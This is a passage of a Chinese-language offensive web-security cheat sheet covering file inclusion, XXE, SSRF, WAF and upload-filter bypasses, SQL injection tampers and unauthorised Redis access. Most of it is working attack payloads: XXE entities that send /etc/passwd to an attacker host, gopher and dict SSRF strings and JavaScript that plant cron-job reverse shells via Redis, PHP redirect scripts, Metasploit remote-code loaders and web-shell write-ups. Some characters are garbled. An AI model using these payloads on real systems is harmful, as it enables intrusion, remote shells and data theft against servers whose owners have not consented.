也可使用phar協議訪問/1.php?file=phar//shell.png/shell老版本可以使用%00截斷/etc/passwd%00(需要 magic_quotes_gpc=off,PHP小于5.3.4有效)/var/www/%00/etc/passwd/././././././.[…]/./././././.(需要 magic_quotes_gpc=off(php版本小于5.2.8(?)可以成功,linux需要文件名長于4096,windows需要長于256)點號截斷:/boot.ini/………[…]…………(php版本小于5.2.8(?)可以成功,只適用windows,點號需要長于256)
phpinfo-LFI 本地文件包含臨時文件getshell
利用臨時文件刪除時間差獲取shell需要一個lfi漏洞+phpinfo頁面在/tmp/目錄下生成個密碼為f的一句話木馬g
修改腳本的phpinfo文件名稱
LFI文件
執行>python getshell.py 192.168.0.108 80 10080是端口����、100是線程
http://192.168.0.110/index.php?file=../../../tmp/g&f=echo%20%271%27
session + lfi getshell
session.upload_progress.enabled啟用時,文件上傳會產生進度文件/var/lib/php5/sess_/var/lib/php/sess_
LFI SSH Log
>ssh '<?php system($_GET['c']); ?>'@192.168.0.107>http://192.168.0.107/lfi.php?file=/var/log/auth.log&c=ls
RFI&命令注入上線MSF
MSF生成#use exploit/multi/script/web_delivery#set target PHP注入點注入:php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.107:1234/OgsOFaj3yKH'));"RFI:http://www.xx.com/file=http://192.168.0.107:1234/OgsOFaj3yKH
XML
XML設計的宗旨是傳輸數據,而非顯示數據XXE=XML外部實體注入���、XML=可擴展標記語言Xml文件聲明<?xml version="1.0" encoding="UTF-8" standalone="yes"?>DTD為XML的文檔類型定義引入外部DTD<!DOCTYPE 根元素 SYSTEM "filename">參數實體+外部實體<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test [ <!ENTITY % file SYSTEM "file:///etc/passwd"> %file;]>
XML注入
閉合標簽,改寫xml文件,用戶可控,有拼接代碼<?xml version="1.0" encoding="utf-8"?><manager> <admin ><username>admin</username><password>admin</password></admin><admin ><username>root</username><password>root</password></admin></manager>若是password可控,拼接代碼形成注入admin </password></admin><admin ><name>hack</name><password>hacker</password></admin>
XXE
https://github.com/AonCyberLabs/xxe-recursive-download程序解析XML輸入時,未禁止外部實體的加載,造成任意文件讀取��、命令執行��、內網端口掃描���、攻擊內網網站�����、發起Dos攻擊等危害
判斷
回顯路徑 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "test">%remote;]>DNSLOG http://www.dnslog.cn/<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY dtd SYSTEM "http://xxx.dnslog.cn/xxe">]><xxe>&dtd;</xxe>Webdav 存在webdav可使用PROPPATCH��、PROPFIND��、 LOCK等請求方法接受xml輸入形成xxeWsdl使用AWVS測試
挖掘
如遇與xml交互的地方<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ANY [ <!ENTITY test "this is test">]><root>&test;</root>看是否輸出檢查是否支持外部實體<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY % foo SYSTEM "http://attacker/evil.xml"> %foo;]>查看你的服務器是否有請求JSON content-type XXE修改Content-Type: application/xmlX-Requested-With: XMLHttpRequest<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><root><參數name>name</參數name><參數value>&xxe;</ 參數value></root>
有回顯讀取本地文件
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE creds [ <!ENTITY goodies SYSTEM "file:////etc/passwd"> ]><creds>&goodies;</creds>也可去掉文件列目錄file:///root/.sh/id_rsa特殊字符<?xml version="1.0" encoding="utf-8"?><!DOCTYPE roottag [<!ENTITY % start "<![CDATA["> <!ENTITY % goodies SYSTEM "file:////tmp/xxx.txt"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://attacker/evil.dtd">%dtd; ]><roottag>&all;</roottag>evil.dtd<?xml version="1.0" encoding="UTF-8"?><!ENTITY all "%start;%goodies;%end;">
Blind OOB XXE無回顯讀取
需使用參數實體,引用外部DTDPayload<!DOCTYPE convert [<!ENTITY % remote SYSTEM "http://ip/test.dtd">%remote;%int;%send;]>test.dtd<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd"><!ENTITY % int "<!ENTITY % send SYSTEM 'http://attacker:9999?p=%file;'>">
列目錄
遠程payload<!ENTITY % a SYSTEM "file:///"> <!ENTITY % b "<!ENTITY % c SYSTEM 'gopher://ip:80/%a;'>"> %b; %c;注入payload<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker:80/1.xml">%remote;]><root/>
不同平臺支持的協議
執行命令
安裝expect擴展的PHP環境里執行系統命令,其他協議也有可能可以執行系統命令�。<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "expect://id" >]><root><name>&xxe;</name></root>
內網主機探測
可先讀取/etc/network/interfaces��、/proc/net/arp�����、/etc/hosts等文件查詢IP段使用腳本
內網端口掃描
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE data SYSTEM "http://127.0.0.1:515/" [ <!ELEMENT data (#PCDATA)> ]><data>4</data>可使用burpsuite的intruder模塊進行遍歷
內部DTD利用
Linux
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamsa 'Your DTD code'>%local_dtd;
Windows
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"><!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'>%local_dtd;<?xml version="1.0" ?><!DOCTYPE message [<!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"><!ENTITY % condition 'aaa)> <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; <!ELEMENT aa (bb'>%local_dtd;]><message>any text</message>
XXE寫shell
當XXE支持XSL時<?xml version='1.0'?><xsl:stylesheet version="1.0"xmlns:xsl="http://www.w3.org/1999/XSL/Transform"xmlns:msxsl="urn:schemas-microsoft-com:xslt"xmlns:user="http://mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="user"><![CDATA[public string xml(){ System.Net.WebClient webClient = new System.Net.WebClient(); webClient.DownloadFile("https://x.x.x.x/shell.txt", @"c:\inetpub\wwwroot\shell.aspx");return "Exploit Success";}]]></msxsl:script><xsl:template match="/"><xsl:value-of select="user:xml()"/></xsl:template></xsl:stylesheet>
SSRF
定義
服務端請求偽造構造一個由服務器發出請求的漏洞服務端提供了從其他服務器應用獲取數據的功能且沒有對目標地址做過濾與限制
成因
file_get_contents()�����、fsockopen()����、curl_exec()���、fopen()���、readfile()等函數使用不當會造成SSRF漏洞
挖掘
轉碼服務在線翻譯獲取超鏈接的標題等內容進行顯示請求遠程服務器資源的地方,圖片加載與下載(通過URL地址加載或下載圖片)圖片�����、文章收藏功能對外發起網絡請求的地方,網站采集��、網頁抓取的地方��。頭像 (遠程加載頭像)一切要你輸入網址的地方和可以輸入ip的地方��。數據庫內置功能(mongodb的copyDatabase函數)郵件系統文件處理在線處理工具從URL關鍵字中尋找:share���、wap��、url��、link�、src�����、source�����、target�����、u��、3g��、display���、sourceURl����、imageURL���、domain
XML
<!ENTITY % d SYSTEM "http://wuyun.org/evil.dtd"><!ENTITY % file system "file:///etc/passwd" ><!ENTITY % d SYSTEM "http://wuyun.org/file?data=%file"><!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://wuyun.org/urlin"><xenc:AgreementMethod Algorithm= "http://wuyun.org/1"><xenc:EncryptionProperty Target= "http://wuyun.org/2"><xenc:CipherReference URI= "http://wuyun.org/3"><xenc:DataReference URI= "http://wuyun.org/4"><Reference URI="http://wuyun.org/5"><To xmlns="http://www.w3.org/2005/08/addressing">http://wuyun.org/to</To><ReplyTo xmlns="http://www.w3.org/2005/08/addressing"><Address>http://wuyun.org/rto</Address><input message="wooyun" wsa:Action="http://wuyun.org/ip" /><output message="wooyun" wsa:Action="http://wuyun.org/op" /><wsp:PolicyReference URI=“http://wuyun.org/pr"><fed:Federation FederationID="http://wuyun.org/fid"><fed:FederationInclude>http://wuyun.org/inc</fed:FederationInclude><fed:TokenIssuerName>http://wuyun.org/iss</fed:TokenIssuerName><mex:MetadataReference><wsa:Address>http://wuyun.org/mex</wsa:Address></mex:MetadataReference><edmx:Reference URI="http://wuyun.org/edmxr"><edmx:AnnotationsReference URI="http://wuyun.org/edmxa"><xbrli:identifier scheme="http://wuyun.org/xbr"><link:roleType roleURI="http://wuyun.org/role"><stratml:Source>http://wuyun.org/stml</stratml:Source>
數據庫
MongoDB
db.copyDatabase('\r\nconfig set dbfilename ssrf\r\nquit\r\n’,'test','10.6.4.166:6379')
PostgresSQL
select dblink_send_query( 'host=127.0.0.1dbname=quituser=\'\r\nconfig set dbfilename wyssrf\r\n\quit\r\n'password=1 port=6379 sslmode=disable','select version();’);
MSSQL
select openrowset('SQLOLEDB', 'server=192.168.1.5;uid=sa;pwd=sa;database=master')select * FROM OpenDatasource('SQLOLEDB', 'Data Source=ServerName;User ID=sa;Password=sa' ) .Northwind.dbo.Categories
圖片處理函數
FFmpegconcat:http://wyssrf.wuyun.org/header.y4m|file:///etc/passwdImageMagickfill 'url(http://wyssrf.wuyun.org)'
攻擊
測試代碼,需安裝phpcurl模塊apt-get install php7.0-curl<?phpecho 'r u ok?';function curl($url){ $ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_exec($ch);curl_close($ch);}$url = $_GET['url'];curl($url);?>對內網�����、本地進行端口掃描,獲取服務的banner 信息攻擊運行在內網或本地的應用程序對內網 WEB 應用進行指紋識別,通過訪問默認文件實現(如:readme文件)攻擊內外網的 web 應用,主要是使用 GET 參數就可以實現的攻擊(如:Struts2,sqli)讀取內網資源(如:利用file協議讀取本地文件等)跳板無視cdn利用Redis未授權訪問,HTTP CRLF注入實現getshell
文件讀取
>curl -v 'http://192.168.0.110/ssrf.php?url=file:///etc/passwd'
?url=php://filter/read=convert.base64-encode/resource=./1.php
端口探測
>curl -v 'http://www.xx.com/ssrf.php?url=dict://127.0.0.1:22/'
>curl -v 'http://www.xx.com/ssrf.php?url=dict://127.0.0.1:6379/info'
SSRF+Redis
>curl -v 'http://192.168.0.112/ssrf.php?url=gopher://192.168.0.120:6379/_*1%250d%250a%248%250d%250aflushall%250d%250a%2a3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2464%250d%250a%250d%250a%250a%250a%2a%2f1%20%2a%20%2a%20%2a%20%2a%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.0.108%2f12345%200%3E%261%250a%250a%250a%250a%250a%250d%250a%250d%250a%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2fvar%2fspool%2fcron%2f%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2a1%250d%250a%244%250d%250asave%250d%250aquit%250d%250a'
302反彈shell
?url=http://xxxx/302.php?s=dict&ip=10.20.*.*&port=6379&data=flushall302.php<?php$ip = $_GET['ip'];$port = $_GET['port'];$scheme = $_GET['s'];$data = $_GET['data'];header("Location: $scheme://$ip:$port/$data");?>?url=http://xxxx/reverse.php?s=dict&ip=10.20.*.*&port=6379&bhost=*.*.*.*&bport=1234reverse.php<?php$ip = $_GET['ip'];$port = $_GET['port'];$bhost = $_GET['bhost'];$bport = $_GET['bport'];$scheme = $_GET['s'];header("Location: $scheme://$ip:$port/set:0:\"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20/dev/tcp/{$bhost}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a\"");?>?url=http://xxxx/302.php?s=dict&ip=10.20.*.*&port=6379&data=config:set:dir:/var/spool/cron/?url=http://xxxx/302.php?s=dict&ip=10.20.*.*&port=6379&data=config:set:dbfilename:root?url=http://xxxx/302.php?s=dict&ip=10.20.*.*&port=6379&data=save可設置burp–>intruder指定變量跑�����。
Mysql
https://github.com/FoolMitAh/mysql_gopher_attackhttps://fireshellsecurity.team/isitdtu-friss/
Weblogic SSRF+Redis
探測/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:80Redis反彈set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/121.36.67.230/4444 0>&1\n\n\n\n"config set dir /etc/config set dbfilename crontabsave/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://192.168.0.110:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F121.36.67.230%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0AaaaSSRF+內網Struct2http://www.xx.com/ssrf.php?url=http://10.1.1.1/action?action?redirect:http://attackerip/
Ueditor SSRF
/editor/ueditor/php/controller.php?action=catchimage&source[]=http://my.ip/?aaa=1%26logo.png
Discuz
/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo
探測存活主機
直接訪問http://www.xx.com/ssrf.php?url=http://192.168.0.1
偽造POST請求>curl -v 'http://www.xx.com/ssrf.php?url=gopher://192.168.0.10:80/_POST%20/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.139%250d%250aUser-Agent:%20curl/7.42.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=bbbbb'
繞過方法
本地繞過http://127.0.0.1=http://localhost[::]繞過http://[::]:80=http://127.0.0.1@繞過http://www.xx.com/1.php?url=http://www.xx.com@127.0.0.1:8080利用短網址http://tool.chinaz.com/tools/dwz.aspxhttp://dwz.cn/DNS解析http://www.qq.com.127.0.0.1.xip.io,可解析為127.0.0.1自己域名設置A記錄,指向127.0.0.1進制轉換127.0.0.1八進制:0177.0.0.1十六進制:0x7f.0.0.1十進制:2130706433http://www.bejson.com/convert/ip2int/句號127����。0�����。0���。1302腳本<?php$ip = $_GET['ip'];$port = $_GET['port'];$scheme = $_GET['s'];$data = $_GET['data'];header("Location: $scheme://$ip:$port/$data");?>攻擊方VPS監聽8080dict協議dict://www.attack.com:8080/hello:dict等于ssrf.php?url=http://attack.com/302.php?s=dict&ip=www.attack.com&port=8080&data=hello:dictGopher協議gopher:// www.attack.com:8080/gopherssrf.php?url=http://attack.com/302.php?s=gopher&ip=www.attack.com&port=8080&data=gopherFile協議攻擊機新建file.php<?phpheader("Location: file:///etc/passwd");?>ssrf.php?url=http://attack.com/file.php
gopher協議的腳本轉換
抓取本地測試的正常請求>socat -v tcp-listen:4444,fork tcp-connect:目標IP:6379
將捕獲日志保存txt使用腳本轉換為支持gopher協議的字符串轉換規則如果第一個字符是>或者< 那么丟棄該行字符串,表示請求和返回的時間�。如果前3個字符是+OK 那么丟棄該行字符串,表示返回的字符串��。將\r字符串替換成%0d%0a空白行替換為%0a
本地可執行
遠程執行需對空格進行編碼后再url編碼一次*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$63%0d%0a%0a%0a%0a*/1%20*%20*%20*%20*%20bash%20-i%20>&%20/dev/tcp/192.168.0.108/12138%200>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a
協議
Curl版本需低于7.15.1file:可回顯時,使用file讀取任意文件dict:查看端口,操作內網服務gopher:可發出get/post請求使用gopher協議時,要進行兩次url編碼http/https:探測存活主機
dict協議寫shell
?url=dict://127.0.0.1:6379/set:x:<?php phpinfo();?>?url=dict://127.0.0.1:6379/config:set:dir:/www/wwwroot/?url=dict://127.0.0.1:6379/config:set:dbfilename:php.php?url=dict://127.0.0.1:6379/saveUnicode編碼?url=dict://127.0.0.1:6379/set:x:"\x3C\x3Fphp\x20echo `$_GET[x]`\x3B\x3F\x3E"
slaveof復制shell到目標
From:http://r3start.net/index.php/2020/05/09/683你的redis設置一個shell的鍵Yourredis>FLUSHALLYourredis>set shell "<?php phpinfo();?>"?url=dict://127.0.0.1:6379/slaveof:yourredisIP:6379?url=dict://127.0.0.1:6379/config:set:dir:/www/wwwroot/?url=dict://127.0.0.1:6379/config:set:dbfilename:test.php?url=dict://127.0.0.1:6379/save?url=dict://127.0.0.1:6379/slaveof:no:one
slaveof反彈shell
?url=dict://127.0.0.1:6379/slaveof: yourredisIP:6379?url=dict://127.0.0.1:6379/config:set:dbfilename:exp.so?url=dict://127.0.0.1:6379/MODULE:LOAD:./exp.so?url=dict://127.0.0.1:6379/SLAVEOF:NO:ONE?url=dict://127.0.0.1:6379/config:set:dbfilename:dump.rdb?url=dict://127.0.0.1:6379/system.exec:'curl x.x.x.x/x'?url=dict://127.0.0.1:6379/system.rev:x.x.x.x:8887
Fuzz/掃描web
#dirb http://192.168.0.1 /root/asp.txt,/root/dir.txt -a "USER-AGENT" –c "Cookie" -z 100#nikto -C all -h http://192.168.0.107 nikto掃描web服務#wpscan --url http://192.168.0.107/ -e u --wordlist /root/wordlist.txt 枚舉用戶爆破密碼#wpscan --url http://192.168.0.107/ -e vp 掃描漏洞插件#perl joomscan.pl --url 192.168.0.107
WFuzz
爆破文件和文件夾>wfuzz -w wordlist URL/FUZZ.php>wfuzz -w wordlist URL/FUZZ枚舉數字參數>wfuzz -z range,000-999 -b session=session -b cookie=cookie http://127.0.0.1/getuser.php?uid=FUZZPOST賬號密碼爆破FUZnZ>wfuzz -w userList -w pwdList -d "username=FUZZ&password=FUZ2Z" http://127.0.0.1/login.php隨機HTTP頭>wfuzz -z range,0000-9999 -H "X-Forwarded-For: FUZZ" http://127.0.0.1/get.php?userid=666使用代理fuzz>wfuzz -w wordlist -p 127.0.0.1:1087:SOCKS5 URL/FUZZ基礎認證爆破>wfuzz -z list,"username-password" --basic FUZZ:FUZZ URL【結果過濾】--hc或--ss不顯示符合條件的結果�����?!窘Y果過濾】--sc或--sl或--sw或--sh顯示符合條件的結果���。
Cewl
爬行網站存為字典>cewl http://www.qq.com/ -w dict.txt指定字典長度>cewl http://www.qq.com/ -m 9 -w dict.txt網站提取Email>cewl http://www.qq.com/ -n –e
Dirsearch
>python3 dirsearch.py --random-user-agents --recursive --thread 50 --extension php --plain-text-report report.txt –url http://127.0.0.1
Bypass WAF
SQL注入分塊傳輸
https://github.com/c0ny1/chunked-coding-converter
跑注入點被攔截
使用分塊傳輸,右鍵選擇
使用SQLMAP跑注入
>python sqlmap.py -r 1.txt --batch --proxy=http://127.0.0.1:8080 --dbs
自動提供可用的tamper
https://github.com/m4ll0k/AtlasGET類型的注入python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -vPOST類型的注入python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v請求頭注入python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v組合tamperpython atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v列出tamperpython atlas.py -g例子注入python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3
可以看到被攔截了查找能繞過的tamperpython atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v
根據返回碼200得到一個可繞過waf的tamperversionedkeywords這個tamper繼續注入python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords根據狀態碼來判斷有時會有點雞肋,但是也能用用,隨機發揮吧�����。
垃圾數據
#coding=utf-8import random,stringfrom urllib import parse# code by yzddMr6varname_min = 5varname_max = 15data_min = 20data_max = 25num_min = 50num_max = 100def randstr(length): str_list = [random.choice(string.ascii_letters) for i in range(length)] random_str = ''.join(str_list) return random_strdef main(): data={} for i in range(num_min,num_max): data[randstr(random.randint(varname_min,varname_max))]=randstr(random.randint(data_min,data_max)) print('&'+parse.urlencode(data)+'&')main()放到要注入的字段前后
上傳bypass
圖片文件頭
PNG 的文件頭為十六進制的 89 50 4E 47 0D 0A 1A 0AGIF 為 47 49 46 38 37 61JPG 為 FF D8 FF E0
添加圖片頭或合并圖片包含
后綴大小寫
文件名前綴加[0x09]
上傳.htaccess
SetHandler application/x-httpd-php
二次渲染
GIF找好一個大一點的GIF,尾部使用c32插入shell,上傳,下載回來,使用burp的comparer功能找出整個文件沒有被渲染的位置,插入shell再上傳JPG使用腳本直接生成https://github.com/BlackFan/jpg_payloadPNG使用腳本直接生成先取消php.ini注釋;extension=php_gd2.dll<?php$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d, 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 0x66, 0x44, 0x50, 0x33);$img = imagecreatetruecolor(32, 32);for ($y = 0; $y < sizeof($p); $y += 3) { $r = $p[$y]; $g = $p[$y+1]; $b = $p[$y+2]; $color = imagecolorallocate($img, $r, $g, $b); imagesetpixel($img, round($y / 3), 0, $color);}imagepng($img,'./1.png');?>
上傳php3,php4,phtml等
文件名后加::$DATA
ConTent-Disposition: form-data; name="filepath"; filename="1.asp::$DATA"ConTent-Disposition: form-data; name="filepath"; filename="1.asp::$DATA\0x00\1.asp0x00.jpg"
asp . (空格+.)
php. .(點+空格+點)
雙寫phphpp
00截斷
Get參數00截斷直接添加%00POST參數00截斷修改hex為00
修改一些固定的參數
文件名去掉雙引號
加一個filename1的參數
form變量改成f+orm
去掉form-data
在Content-Disposition或form-data;后添加多個空格
引號回車
ConTent-Disposition: form-data; name="filepath"; filename="backlion.asp"
Content-Type和ConTent-Disposition調換位置
文件名前綴加空格
filename= "1.asp"
name前加空格
Content-Disposition: form-data; name="uploaded"; filename="1.asp"
form-data的前后加上+
Content-Disposition: +form-data; name="filepath"; filename="1.asp"
ASP+IIS
s%elect>selects%u0065lect>select s%u00f0lect>selects%u0045lect = s%u0065lect = %u00f0lectu -->%u0055 --> %u0075n -->%u004e --> %u006ei -->%u0049 --> %u0069o -->%u004f --> %u006f -->%u00bas -->%u0053 --> %u0073l -->%u004c --> %u006ce -->%u0045 --> %u0065-->%u00f0c -->%u0043 --> %u0063t -->%u0054 -->%u0074 -->%u00de -->%u00fef -->%u0046 -->%u0066r -->%u0052 -->%u0072m -->%u004d -->%u006d
Asp+iis&aspx+iis
s%u006c%u0006ect>select
apache
TEST /sql.php?id=1 HTTP/1.1
大小寫/關鍵字
UniOn SeLECTMid()substring() ? substr()Hex()?ascii()sleep() =benchmark()concat_ws()=group_concat()
雙重url編碼
變換請求方式
HPP參數污染
id=1&id=2&id=3得到的結果:Asp.net + iis:id=1,2,3Asp+iis:id=1,2,3Php+apache:id=3MSSQL:GET+POST:GET:http://192.168.125.140/test/sql.aspx?id=1 union/*post: id=2*/select null,null,null無逗號形式:?id=1unionselect 1&id=2&id=3&id=4 from admin--() 利用逗號:?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--無效參數形式:?a=/*&sql=xxx&b=*/ a,b為無效參數溢出形式:?id=1/*&id=*//*&id=*//*......&id=*//*&id=*/unionselect null,system_user,null from INFORMATION_SCHEMA.schemataMYSQL:?id=1&id=1&id=1&id=1&id=1&id=1&id=1&id=….. &id=1unionselect 1,2 from admin
數據庫
Access
空格符%09��、%0a���、%0c���、%0d�����、%16
Mysql
注釋符#�����、/*...*/����、--[空格] ...空格符[0x09,0x0a-0x0d,0x20,0xa0]特殊符號%a 換行符,可結合注釋符使用%23%0a,%2d%2d%0a�。%21 ! 嘆號%2b + 加號%2d - 減號%40 @ 符號%7e ~ 波浪號Id=1unionselect(1),user()Id=1union/!12345select/1,user()Id=1unionselect@1,user()Id=1unionselect {x 1},user()Id=1unionselect"1",user()Id=1unionselect\N,user()Id=1unionselect 1,user()`Id=1unionselect 1,user()""Id=1unionselect 1,user()AId=1unionselect 1,user()`bId=1 union(select 1,(select/!schema_name/from information_schema.SCHEMATA limit 1,1))Id=1 union(select 1,(select{x schema_name}from information_schema.SCHEMATA limit 1,1))Id=1 union(select 1,(select(schema_name)from information_schema.SCHEMATA limit 1,1))浮點數Id= 1.0union select 1,user()Id= 1.union select 1,user()Id= 1E0union select 1,user()Id=\Nunion select 1,user()Id=1 unionselect user(),2.0from adminId=1unionselect user(),8e0from adminId=1unionselect user(),\Nfrom admin內聯注釋/*!UnIon12345SelEcT*/ 1,user() //數字范圍 1000-50540mysql黑魔法select{x username}from {x11 test.admin};函數截取Mid(version(),1,1)Substr(version(),1,1)Substring(version(),1,1)Lpad(version(),1,1)Rpad(version(),1,1)Left(version(),1)reverse(right(reverse(version()),1))連接concat(version(),'|',user());concat_ws('|',1,2,3)字符轉換Ascii() char() Hex() Unhex()過濾逗號127'unionselect * FROM ((SELECT1)a JOIN (SELECT2)b JOIN (SELECT3)c JOIN (SELECT4)d JOIN (SELECT5)e)#相當于unionselect 1,2,3,4,5union select * from (select 1)a join(select{x schema_name} from information_schema.SCHEMATA limit 1,1)blimit 1 offset 0相當于limit 1,0mid(version() from 1 for 1)相當于Mid(version(),1,1)<>被過濾id=1 and ascii(substr(database(),0,1))>64比較符greatest(n1,n2,n3,等)函數返回輸入參數(n1,n2,n3,等)的最大值id=1 and greatest(ascii(substr(database(),0,1)),64)=64函數構造sleep(5)/benchmark(10000000,SHA1(1))id=1 xor sleep%23%0a(5)id=1 xor sleep%2d%2d%0a(5)id=1 xor sleep([%20]5)id=1 xor benchmark%0a(10000000,SHA1(1))id=1 xor sleep[空白字符](5)select{x[可填充字符]1}
MSSQL
注釋符/*��、--�、;00%���、/**/空格符[0x01-0x20][0x0a-0x0f][0x1a-0x-1f]特殊符號%3a 冒號id=1 union:select 1,2 from:adminid=1unionselect+1,'2',db_name() from adminid=1unionselect-1,'2',db_name() from adminid=1unionselect.1,'2',db_name() from adminid=1unionselect:1,'2',db_name() from adminid=1unionselect~1,'2',db_name() from adminid=1%20union%20select%201,'2',db_name()%80from%20adminid=1unionselect 1,'2',db_name+() from admin函數變形: db_name[空白字符]()浮點數id=1.1union select 1,'2',db_name()id=1e0union select 1,'2',db_name()運算符id=1-1union select '1',system_user,3 from adminid=1e-union select '1',system_user,3 from admin字符串截取函數Substring(@@version,1,1)Left(@@version,1)Right(@@version,1)charindex('test',db_name())字符串轉換函數Ascii('a')=char(97) 括號之間可添加空格
WAF
同時提交GET和POST訪問HTTP繞過對HTTPS的防護%00截斷參數填充垃圾數據,緩沖區溢出X-FORWARDED-FOR偽造繞過靜態文件/sql.php/1.js?id=1繞過白名單繞過,URL只要存在某字符就不會攔截/sql.php/admin.php?id=1/sql.php?a=/manage/&b=../etc/passwd/../../../manage/../sql.asp?id=2偽造User-agent繞過,可改為爬蟲agent
未授權訪問
Redis未授權訪問
測試
>redis-cli -h 127.0.0.1 flunshall192.168.0.110:6379>pingPONG 存在未授權訪問
JS打內網
var cmd = new XMLHttpRequest(); cmd.open("POST", "http://127.0.0.1:6379"); cmd.send('flushall\r\n'); var cmd =new XMLHttpRequest(); cmd.open("POST", "http://127.0.0.1:6379"); cmd.send('eval \'' + 'redis.call(\"set\",\"1\",\"\\n\\n*/1 * * * * /bin/bash -i >&/dev/tcp/外網IP/5566 0>&1\\n\\n");redis.call(\"config\", \"set\", \"dir\",\"/var/spool/cron/\"); redis.call(\"config\",\"set\", \"dbfilename\", \"root\");' + '\' 0' +"\r\n"); var cmd =new XMLHttpRequest(); cmd.open("POST", "http://127.0.0.1:6379"); cmd.send('save\r\n');
反彈shell
